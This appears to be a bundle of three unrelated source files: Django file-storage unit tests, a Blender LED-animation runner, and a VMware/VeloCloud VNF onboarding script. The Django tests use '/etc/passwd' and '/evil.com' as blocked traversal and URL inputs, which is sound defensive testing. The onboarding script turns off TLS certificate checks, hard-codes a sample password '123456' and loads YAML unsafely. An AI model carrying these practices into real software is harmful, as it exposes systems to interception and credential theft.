f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error'):
raise FileExistsError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileNotFoundError are raised.
with self.assertRaises(FileExistsError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overriden_media_root',
'MEDIA_URL': 'overriden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
blender.py | import sys
import os
import threading
import importlib
import bpy
sys.path.append(os.path.dirname(bpy.data.filepath))
import neopixel
importlib.reload(neopixel)
xmaslights = __import__("xmaslights-spin")
importlib.reload(xmaslights)
xmaslights.coordfilename = os.path.join(os.path.dirname(bpy.data.filepath),"coords.txt")
duration_seconds = 10
def stop_after_duration():
import time
time.sleep(duration_seconds)
neopixel.finished = True
if __name__ == "__main__":
stop_thread = threading.Thread(target=stop_after_duration)
#Create the LED objects before starting the timer
pixels = neopixel.NeoPixel()
neopixel.finished = False
stop_thread.start()
try:
xmaslights.xmaslight()
except neopixel.FinishedException:
pass
stop_thread.join()
|
vnf.onboard.py | #!/usr/bin/python
"""
After ESXi on-boarding finish it push a new job to a AMPQ.
This listener should receive event via AMPQ and start VNF on-boarding.
In this specific case VNF listener on-boards a Velo Cloud VNF.
In order to do that it must have access to VNF Image, the image itself my
contain respected OVF and VMDK file.
Script doesn't untar OVA file, Clinet must sure it untar respected OVA file
and upload to directory indicated in image-dir
Example configuration in default.yaml.
- Script must contain valid enterpriseId that is configured in Velo Cloud Orchestrator platform.
- It must have access so Velo Cloud becase listner create Velo Edge device for each remote esxi host.
- Prepare Profile. In this case it called test.
- untar velo gateway OVA file to a target dir image-dir.
It should contain VeloCloud-Edge.ovf and respected VMDK file.
vnf-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/image"
image-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/final_image"
enterpriseId: 42 # we need to know id in order to get activation key
vce-vco: "velo cloud host address"
vco-username: "mbayramov@vmware.com"
vco-password: "123456"
ovf-filename: "VeloCloud-Edge.ovf" # we should have ovf file and vmdk file in vnf-dir
vnf-default-password: "123456" # default password for edge
vnf-default-name: "velo-edge-vc" # default name search on each new host
profile-name: "test " # VCO should have this profile
vnf-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/image"
image-dir: "/Users/spyroot/PycharmProjects/ydk-netconf/vcenter/final_image"
In second section we need provide information about default network that listner will configure in remote ESXi
host in order connect Velo Edge.
You probably need change only pnic name. pnic0/pnic1 etc. ( it must be two unused pnic on a remote host)
for example if pnic0 used for vSwitch0
We can assign pnic1 and pnic2 to vSwitch2 and vSwitch3. One switch used to communicate to outside network
(Internet / MPLS cloud and another switch used to communicate back to office network)
vnf-network:
topology:
- network: 1
vswitch: "vSwitch2"
port-group-name: "VeloOutside"
pnic: "vusb0" # todo add multi pnic support
interface-name: ["GE1", "GE3"]
vlan_id: 0
- network: 2
vswitch: "vSwitch3"
port-group-name: "VeloInside"
pnic: "vusb1"
interface-name: ["GE2", "GE4", "GE5"]
vlan_id: 0
Mustafa Bayramov
mbayramov@vmware.com
"""
import atexit
import re
import yaml
import inspect
import time
import subprocess
import ssl
import sys
import os
from pyVim import connect
import logging
import dataset
import time
import pika
import json
from time import sleep
import socket
import atexit
from pyVim import connect
from vcenter.tools import cli
from vcenter.tools import tasks
import os
import tarfile
from pyVim.connect import SmartConnect
from pyVmomi import vim
import pyVmomi
import ssl
import tarfile
from threading import Thread
import subprocess
from xml.dom.minidom import parse, parseString
from pprint import pprint
import pprint
import urllib2
import ztp.velocloud
from ztp.velocloud.rest import ApiException
import argparse
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',
handlers=[logging.FileHandler("vnf_onboarding.log"), logging.StreamHandler(sys.stdout)],
level=logging.INFO)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_NONE
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='Path to config file', required=False)
args = vars(parser.parse_args())
DEFAULT_CONFIG = "config/default.yaml"
if args['config']:
DEFAULT_CONFIG = args['config']
# read config and create default connector to vCenter.
config = yaml.load(open(DEFAULT_CONFIG))
si = SmartConnect(host=config["vcenter"]["ip"],
user=config["vcenter"]["user"],
pwd=config["vcenter"]["password"], port=443,
sslContext=context)
content = si.content
def get_all_objs(content, vimtype):
"""
Return all object for a given VIM Type
:param content:
:param vimtype:
:return:
"""
obj = {}
container = content.viewManager.CreateContainerView(
content.rootFolder, vimtype, True)
for managed_object_ref in container.view:
obj.update({managed_object_ref: managed_object_ref.name})
return obj
def get_obj(content, vimtype, name):
"""
Get the vsphere object associated with a given text name
:param content: Si.Content
:param vimtype:
:param name:
:return:
"""
obj = None
container = content.viewManager.CreateContainerView(content.rootFolder,
vimtype, True)
for view in container.view:
if view.name == name:
obj = view
break
return obj
def provision(vm):
"""
Provisions VNF and change VNF to power on
:param vm:
:return:
"""
logging.info("The current powerState is: {0}".format(vm.runtime.powerState))
if 'poweredOn' in vm.runtime.powerState:
logging.info("VNF already in power on state.")
else:
task = vm.PowerOnVM_Task()
tasks.wait_for_tasks(si, [task])
logging.info("The current powerState is: {0}".format(vm.runtime.powerState))
def tardir(path, tar_name):
"""
Tars given path to a file with given name
:param path:
:param tar_name:
:return:
"""
with tarfile.open(tar_name, "w:") as tar_handle:
for root, dirs, files in os.walk(path):
for file in files:
tar_handle.add(os.path.join(root, file))
def populate_ova(vnf_property_dict=None):
"""
Populate OVF entries for a velo cloud and pack everything as single OVA image
:type vnf_property_dict:
"""
logging.info("OVF adaptation.")
path_to_files = vnf_property_dict['vnf_dir'] + '/' + vnf_property_dict['ovf_filename']
if os.path.exists(path_to_files):
with open(path_to_files) as datasource:
ovf_descriptor = parse(datasource)
tag = ovf_descriptor.getElementsByTagName("ProductSection")
for t in tag:
for ovf_property in t.getElementsByTagName('Property'):
if 'velocloud.vce.vco' == ovf_property.attributes['ovf:key'].value:
ovf_property.attributes['ovf:value'].value = vnf_property_dict['vce.vco']
if 'velocloud.vce.activation_code' in ovf_property.attributes['ovf:key'].value:
ovf_property.attributes['ovf:value'].value = vnf_property_dict['activation_code']
if 'velocloud.vce.vco_ignore_cert_errors' in ovf_property.attributes['ovf:key'].value:
ovf_property.attributes['ovf:value'].value = "true"
if 'password' in ovf_property.attributes['ovf:key'].value:
ovf_property.attributes['ovf:value'].value = vnf_property_dict['password']
# populate a new file
final_dir = vnf_property_dict['image_dir'] + '/' + vnf_property_dict['target_host'] + '/'
if not os.path.exists(final_dir):
os.makedirs(final_dir)
new_ovf_file = "{0}/{1}/{2}".format(vnf_property_dict['image_dir'],
vnf_property_dict['target_host'],
vnf_property_dict['ovf_filename'])
with open(new_ovf_file, "wb") as file_handle:
ovf_descriptor.writexml(file_handle, encoding="utf-8")
file_handle.close()
if final_dir is None:
return None
new_vnf_image = final_dir + '/edge.ova'
tardir(vnf_property_dict['vnf_dir'], new_vnf_image)
return new_vnf_image
def get_obj_in_list(obj_name, obj_list):
"""
Gets an object out of a list (obj_list) whos name matches obj_name from vCenter inventory
"""
for o in obj_list:
if o.name == obj_name:
return o
print("Unable to find object by the name of %s in list:\n%s" % (o.name, map(lambda o: o.name, obj_list)))
def get_objects(si=None, vim_dict=None):
"""
Returns a dict containing the necessary objects for deployment OVF container file.
"""
# get data center object.
datacenter_list = si.content.rootFolder.childEntity
if 'datacenter_name' not in vim_dict:
return False
datacenter_obj = get_obj_in_list(vim_dict['datacenter_name'], datacenter_list)
# get datastore object.
datastore_list = datacenter_obj.datastoreFolder.childEntity
if "datastore_name" in vim_dict:
datastore_obj = get_obj_in_list(vim_dict['datastore_name'], datastore_list)
elif len(datastore_list) > 0:
datastore_obj = datastore_list[0]
else:
print("No datastores found in DC (%s)." % datacenter_obj.name)
return False
# Get cluster object.
cluster_list = datacenter_obj.hostFolder.childEntity
if 'cluster_name' in vim_dict:
cluster_obj = get_obj_in_list(vim_dict['cluster_name'], cluster_list)
elif len(cluster_list) > 0:
cluster_obj = cluster_list[0]
else:
print("No clusters found in DC (%s)." % datacenter_obj.name)
# Generate resource pool.
resource_pool_obj = cluster_obj.resourcePool
return {"datacenter": datacenter_obj,
"datastore": datastore_obj,
"resource pool": resource_pool_obj}
def get_ovf_descriptor(ovf_path):
"""
Read in the OVF descriptor.
"""
with open(ovf_path, 'r') as f:
try:
ovfd = f.read()
f.close()
return ovfd
except:
logging.info("Could not read file: %s" % ovf_path)
def keep_lease_alive(lease):
"""
Keeps the lease alive while POSTing the VMDK.
"""
while True:
sleep(5)
try:
# Choosing arbitrary percentage to keep the lease alive.
lease.HttpNfcLeaseProgress(50)
if lease.state == vim.HttpNfcLease.State.done:
return
# If the lease is released, we get an exception.
# Returning to kill the thread.
except:
return
def get_esxi_host(target_host=None):
"""
Search and return vim.HostSystem
:param target_host:
:return: vim.HostSystem
"""
objview = content.viewManager.CreateContainerView(
content.rootFolder, [vim.HostSystem], True)
esxi_hosts = objview.view
# we search for target ESXi system in vCenter inventory
for esxi_host in esxi_hosts:
if target_host == esxi_host.name:
return esxi_host
return None
